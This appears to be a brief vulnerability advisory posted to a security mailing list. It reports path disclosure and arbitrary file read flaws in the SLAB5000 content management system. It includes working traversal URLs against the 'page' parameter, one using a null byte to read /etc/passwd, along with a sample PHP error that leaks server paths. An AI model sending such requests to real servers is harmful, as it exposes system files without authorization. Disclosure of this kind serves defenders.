<<< Date Index >>>     <<< Thread Index >>>

Path Disclosure and Arbitrary File Read Vulnerability in SLAB5000



[Description]
SLAB500 is a complete, dynamic, modular web-system designed to your 
specifications, allowing you to quickly and conveniently update all your 
content, add new pages, upload images, sounds and video from any browser, via 
our front-end interface from any location that you have web access.
-- taken from they website http://www.slab5000.com --

I discover 2 bugs one known as "path disclosure" and Arbitrary File Read 
Vulnerability in the SLAB5000 Content Management System that allow malicious 
attacker to read sensitive information about the system.

[Path Disclosure]
Due to improper sanity checks in the variable $page:

http://www.server.com/index.php?page=../../../var


Warning: main(/usr/www/users/username/slab500/common/../../../var/index.php): 
failed to open stream: No such file or directory in 
/usr/www/users/usernameb/slab500/folder/index.php on line 63


[File Read]

Due to imporper sanity inputs checks too, just adding the NULL byte and the end 
of the file:

http://www.server.com/index.php?page=../../../../../etc/passwd%00

[Solution]
Edit the source to do sanity input checks as well.

Sorry if my english is bad :)

Justin_T
irc: #nt at Undernet
shoutz: warcold, KrOsS, HoOH, lsdx, jsz, and all the guyz from DO.